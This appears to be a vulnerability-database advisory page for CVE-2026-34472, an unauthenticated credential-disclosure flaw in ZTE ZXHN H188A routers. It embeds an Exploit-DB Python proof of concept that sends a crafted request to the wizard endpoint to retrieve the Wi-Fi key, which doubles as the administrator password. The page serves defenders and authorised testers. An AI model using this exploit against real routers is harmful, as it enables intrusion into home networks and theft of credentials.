CVE-2026-34472

high

Published 2026-03-30 · Modified 2026-05-26

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

7.1

CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

CVSS v4 NEW

—

not yet in upstream

VIR risk

8.1

Description

Unauthenticated credential disclosure in the wizard interface in ZTE ZXHN H188A V6.0.10P2_TE and V6.0.10P3N3_TE allows unauthenticated attackers on the local network to retrieve sensitive credentials from the router's web management interface, including the default administrator password, WLAN PSK, and PPPoE credentials. In some observed cases, configuration changes may also be performed without authentication.

Predictions

Exploit likelihood

70%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-52593 local multiple text · 2 KB

Mina Nageh Salalma · 2026-05-29

ZTE ZXHN H188A V6 - Authentication Bypass

text exploit Source: Exploit-DB

# Exploit Title: ZTE ZXHN H188A V6 - Authentication Bypass 
# Date: 2026-05-20
# Exploit Author: Mina Nageh Salalma (Monx Research)
# Vendor Homepage: https://www.zte.com.cn
# Software Link:
https://github.com/minanagehsalalma/cve-2026-34472-auth-bypass-zte-h188a-router
# Version: ZXHN H188A V6.0.10P2_TE, V6.0.10P3N3_TE
# Tested on: ZTE ZXHN H188A V6.0.10P2_TE
# CVE: CVE-2026-34472

# Description:
# Unauthenticated requests to the root path of ZTE ZXHN H188A V6 firmware
# can reach pre-login wizard handlers and disclose WLAN PSKs, SSIDs, and
# PPPoE usernames. The leaked Wi-Fi password is also the default
administrator
# password after uppercasing, resulting in full authentication bypass.
#
# Root cause: router_logic_impl.lua accepts _type and _tag directly for
# empty-path requests. urlpath_2type_modifier.lua only applies
QuickSetupEnable
# when _type is missing. Wizard handlers then expose credential-bearing read
# actions (getPassword, wlan_get, ppp_get) for unauthenticated users.
#
# Approximately 500 publicly exposed H188A interfaces were reachable at
# time of original report (May 2024). ZTE PSIRT stopped responding; CVE
# assigned by MITRE on 2026-03-27 after escalation.
#
# MITRE CVE: https://www.cve.org/CVERecord?id=CVE-2026-34472

# PoC - Trigger wizard credential endpoint (Python 3 / requests)
import requests
import sys

def exploit(target):
    url = f"http://{target}/"
    # Craft request with _type parameter to bypass QuickSetupEnable gate
    params = {"_type": "loginData", "_tag": "login_entry"}
    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    data = {"IF_ACTION": "getPassword", "_InstID_PASS":
"DEV.WIFI.AP1.PSK1", "PASSTYPE": "PSK"}
    try:
        r = requests.post(url, params=params, headers=headers, data=data,
timeout=10, verify=False)
        print(f"[+] {target} HTTP {r.status_code}")
        print(r.text[:2000])
    except Exception as e:
        print(f"[-] {target}: {e}")

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: poc.py <target_ip>")
        sys.exit(1)
    exploit(sys.argv[1])

References

CWEs

CWE-200 CWE-306

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.